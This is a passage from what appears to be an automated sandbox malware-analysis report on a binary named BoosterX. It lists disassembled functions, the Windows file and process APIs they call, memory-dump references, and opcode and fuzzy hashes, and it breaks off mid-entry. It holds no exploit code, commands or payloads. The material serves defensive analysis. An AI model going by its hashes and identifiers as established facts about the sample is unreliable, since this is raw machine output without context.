                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 2272807158-0
                                                    • Opcode ID: 4ce6273eae071ea6a15124b4380fd2fe6d767a0844e08d4acde4de8883fd2a1f
                                                    • Instruction ID: 2d5e0b697f5cc7d609fa94930720c46b724531d42a1d57d8432ea85812206137
                                                    • Opcode Fuzzy Hash: 4ce6273eae071ea6a15124b4380fd2fe6d767a0844e08d4acde4de8883fd2a1f
                                                    • Instruction Fuzzy Hash: 9341A162A08B82A2EA208F15E4542A963A1FB85BB5F104735DFEDC7BD5CF3CE4908604
                                                    Function 00007FF6C03523F8 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 2176759853-0
                                                    • Opcode ID: ffc9a95c2eb917f8c271226651a7e4a3727d16229f8ced3e106e1d1b4614c68e
                                                    • Instruction ID: 3c99c75ccd8bf705c97f3d0e88e7e83b8d3cc61be258ffff984e04cf2e540ffc
                                                    • Opcode Fuzzy Hash: ffc9a95c2eb917f8c271226651a7e4a3727d16229f8ced3e106e1d1b4614c68e
                                                    • Instruction Fuzzy Hash: 3821A262A18B8292EA149F65A84017AB365FB89BD1F144336EFDD83BA5DF3CD191C700
                                                    Function 00007FF6C0371F14 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: std::bad_alloc::bad_alloc
                                                    • String ID:
                                                    • API String ID: 1875163511-0
                                                    • Opcode ID: ca0a1d78d8e6314f917be1bc01cc39d67f07e0dfb053114c640b6c34b82875d2
                                                    • Instruction ID: 7b36cdaa6a6d2f747f07886a0599ed23da335009b19869f23c1dc1b39e235db2
                                                    • Opcode Fuzzy Hash: ca0a1d78d8e6314f917be1bc01cc39d67f07e0dfb053114c640b6c34b82875d2
                                                    • Instruction Fuzzy Hash: A5315E62A08A87A1FB249F18E5443B963A0EB40B85F540632D7CCD67A5DF6CE556C301
                                                    Function 00007FF6C0363CF4 Relevance: 4.6, APIs: 3, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 1203560049-0
                                                    • Opcode ID: 78a323c9e83038540e709c0a306e8d1f319ba5efdf3dbb668891aceacb5d3961
                                                    • Instruction ID: b7290e927097bcbe99497dff990d05509bce789ad69ab517ff7de9920e5e1d82
                                                    • Opcode Fuzzy Hash: 78a323c9e83038540e709c0a306e8d1f319ba5efdf3dbb668891aceacb5d3961
                                                    • Instruction Fuzzy Hash: 8B21C522B1CA83A2EA208F25E44526A6361FFC9B96F105231EEDEC7795DF3CD544C640
                                                    Function 00007FF6C036317C Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 3118131910-0
                                                    • Opcode ID: 5034e80f18b6dada672af72daf15915e96673b2d3326e463545c04a976a4a92e
                                                    • Instruction ID: c6b023deca0bee5c1cdfd6592c4218709c302357a6d79262bed5d710236e84f9
                                                    • Opcode Fuzzy Hash: 5034e80f18b6dada672af72daf15915e96673b2d3326e463545c04a976a4a92e
                                                    • Instruction Fuzzy Hash: 8521B322A1C78392EA108F25E45526E6361FBC5B96F500231EEDDC6B99DF3CD140CA40
                                                    Function 00007FF6C036327C Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 1203560049-0
                                                    • Opcode ID: 7118c4e6fffe30651da94a39ba5f8c81167afa32e221d2e2d046fdc79b46f602
                                                    • Instruction ID: 7c81f61912ac44e07130a16d47c55f6ae0ba8310532eacf40dedfb905e7d2a39
                                                    • Opcode Fuzzy Hash: 7118c4e6fffe30651da94a39ba5f8c81167afa32e221d2e2d046fdc79b46f602
                                                    • Instruction Fuzzy Hash: 80214122A1868392EA109F29E4451296361FBC9BA5F640331EADDC7BD9DF3CD5458704
                                                    Function 00007FF6C038BEE4 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentExitTerminate
                                                    • String ID:
                                                    • API String ID: 1703294689-0
                                                    • Opcode ID: 8918d945bc68b986d9b4f63ac5cfb24cb8c1f3a7e8295ea6f783a439b1dda531
                                                    • Instruction ID: 97c26f8e828b792dfcf5be8af7f7aa3a408e06ee848f330468afd85e58e2baa4
                                                    • Opcode Fuzzy Hash: 8918d945bc68b986d9b4f63ac5cfb24cb8c1f3a7e8295ea6f783a439b1dda531
                                                    • Instruction Fuzzy Hash: 28E04F24B0430762FB546F319C913792362AFC8B43F00457ACD8EC3396CF3DA4098A00
                                                    Function 00007FF6C035F588 Relevance: 3.2, APIs: 2, Instructions: 193COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C035F8A5
                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C035F8AB
                                                      • Part of subcall function 00007FF6C0363E88: FindClose.KERNELBASE(?,?,00000000,00007FF6C0370791), ref: 00007FF6C0363EBD
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                    • String ID:
                                                    • API String ID: 3587649625-0
                                                    • Opcode ID: 62888dbb9578cb0920daab953437093b21304736e7245625db1b85e939e2aa0d
                                                    • Instruction ID: a7ca68d242a45111bea642c57611d633a41ee274eceb027551dbcd5b6cc3ee2c
                                                    • Opcode Fuzzy Hash: 62888dbb9578cb0920daab953437093b21304736e7245625db1b85e939e2aa0d
                                                    • Instruction Fuzzy Hash: 0B919D37A18A92A4EB10DF24D8442AD7361FB84799F904236EA8CC7BE9DF7CD585C300
                                                    Function 00007FF6C0353904 Relevance: 3.1, APIs: 2, Instructions: 124COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 3668304517-0
                                                    • Opcode ID: 7a253c8ca56257a91ac06a853ed35445757fd21c51e01c3a38e6e0cb422338a9
                                                    • Instruction ID: d27342526f2900655031530a10f02910cf97fb94efd4c9329c00ea38859e8958
                                                    • Opcode Fuzzy Hash: 7a253c8ca56257a91ac06a853ed35445757fd21c51e01c3a38e6e0cb422338a9
                                                    • Instruction Fuzzy Hash: 3041C162F18657A4FB009FB5D4402AD3321AF45B99F141236DE9DEBBAADF38D0828300
                                                    Function 00007FF6C0362738 Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF6C036270D), ref: 00007FF6C0362869
                                                    • GetLastError.KERNEL32(?,00007FF6C036270D), ref: 00007FF6C0362878
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastPointer
                                                    • String ID:
                                                    • API String ID: 2976181284-0
                                                    • Opcode ID: 15a0c32312994542f24a0a355b1d122a2bfdb3c55d25b91561185cfc545188a1
                                                    • Instruction ID: 25c9b8de0f5a129c1d364fbd9ec8ccefea22f71ec75521a29f1af8f290a8df4e
                                                    • Opcode Fuzzy Hash: 15a0c32312994542f24a0a355b1d122a2bfdb3c55d25b91561185cfc545188a1
                                                    • Instruction Fuzzy Hash: 6831C332B19E43A6EA604F2AD940AF92350BF45BD6F151131DF9DC77A1DF3CE4828644
                                                    Function 00007FF6C03522BC Relevance: 3.1, APIs: 2, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Item_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 1746051919-0
                                                    • Opcode ID: 027ba0142be683b64c9b7682b90d490a759d47b8c79e38c26879436e42653007
                                                    • Instruction ID: 55c50d824ddf65bb4fef5f319144921c7146f917101a98407054bf3484d1e7d6
                                                    • Opcode Fuzzy Hash: 027ba0142be683b64c9b7682b90d490a759d47b8c79e38c26879436e42653007
                                                    • Instruction Fuzzy Hash: 4131B026A18783A2EA149F15E44536E7361EF85B95F544232EBDCC7BA5DF3CE180C704
                                                    Function 00007FF6C0362A90 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: File$BuffersFlushTime
                                                    • String ID:
                                                    • API String ID: 1392018926-0
                                                    • Opcode ID: e2360d92fa371ec3cf3789b724fac7dc0eee746b57302bb10420cb3d80e8e918
                                                    • Instruction ID: 9a89c672f1c266d0169816fb5b30835f36890fbd4658a6d77d6f5be0778d202a
                                                    • Opcode Fuzzy Hash: e2360d92fa371ec3cf3789b724fac7dc0eee746b57302bb10420cb3d80e8e918
                                                    • Instruction Fuzzy Hash: 5E219C22E0AB4775EA718E91E5013BA6790BF41796F168431DF8CC6391EF7DD48AC204
                                                    Function 00007FF6C036AAA0 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: LoadString
                                                    • String ID:
                                                    • API String ID: 2948472770-0
                                                    • Opcode ID: 50b4215183bbe14799031b3cc2031c8d40844f06fe2ec6e88c7f343e0a5df25c
                                                    • Instruction ID: d0e3e37d10a8b8e16fa992e1eb80be4c38f6503cc9879a0cdd4eb2eb5152dbad
                                                    • Opcode Fuzzy Hash: 50b4215183bbe14799031b3cc2031c8d40844f06fe2ec6e88c7f343e0a5df25c
                                                    • Instruction Fuzzy Hash: 4F115871B08B4296EB009F16E884169B7A1BB89FC6F544439CA8DE3725DF7CE5418748
                                                    Function 00007FF6C0362B70 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastPointer
                                                    • String ID:
                                                    • API String ID: 2976181284-0
                                                    • Opcode ID: b516d334dd1c85efa09aca89d3d43d2e2cc6a6d2d54fdbc8055284d5c2cf1125
                                                    • Instruction ID: 09168fd3767ecd97a9dcb1bee473c7576babe0917f58300e378b0b3cb7546e4e
                                                    • Opcode Fuzzy Hash: b516d334dd1c85efa09aca89d3d43d2e2cc6a6d2d54fdbc8055284d5c2cf1125
                                                    • Instruction Fuzzy Hash: F1119A21A18A43A1FB608F25E4816A97760FB84BA6F554332DBADD73E5CF3DD486C304
                                                    Function 00007FF6C035255C Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ItemRectTextWindow$Clientswprintf
                                                    • String ID:
                                                    • API String ID: 3322643685-0
                                                    • Opcode ID: b1e1e049dd5e2ad137b0382b0bc9e4d843d915bd339b20a0dba0486b348c3455
                                                    • Instruction ID: 5ab3c9c486fdb9b771379ec54c3dd5db04bd57b899a600e3d0c09bd72ca9dfac
                                                    • Opcode Fuzzy Hash: b1e1e049dd5e2ad137b0382b0bc9e4d843d915bd339b20a0dba0486b348c3455
                                                    • Instruction Fuzzy Hash: B4017124A0D64B61FF595F52A458279A391AF8774AF080434EDCDC63EAEF6CE984C304
                                                    Function 00007FF6C036EAD4 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6C036EB29,?,?,?,?,00007FF6C0365712,?,?,?,00007FF6C036569E), ref: 00007FF6C036EAD8
                                                    • GetProcessAffinityMask.KERNEL32 ref: 00007FF6C036EAEB
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Process$AffinityCurrentMask
                                                    • String ID:
                                                    • API String ID: 1231390398-0
                                                    • Opcode ID: 79722ee71258bf1dae4358653295d549d31541bd73e3f7913cc80f15ba5fc09c
                                                    • Instruction ID: fb5ba4b683e99d7149ba9b99270e59f81d54bade6e3f46bd95d86f665623af63
                                                    • Opcode Fuzzy Hash: 79722ee71258bf1dae4358653295d549d31541bd73e3f7913cc80f15ba5fc09c
                                                    • Instruction Fuzzy Hash: BCE02B61F1858792DF088F55D4414E96391FFC8B41B848036D54FC3714DF2CE54D8B00
                                                    Function 00007FF6C0382150 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                    • String ID:
                                                    • API String ID: 1173176844-0
                                                    • Opcode ID: 1bb7e24e02d919eeb5b6f2c6636e471bde2a2032dbf585f53a3051670f130e73
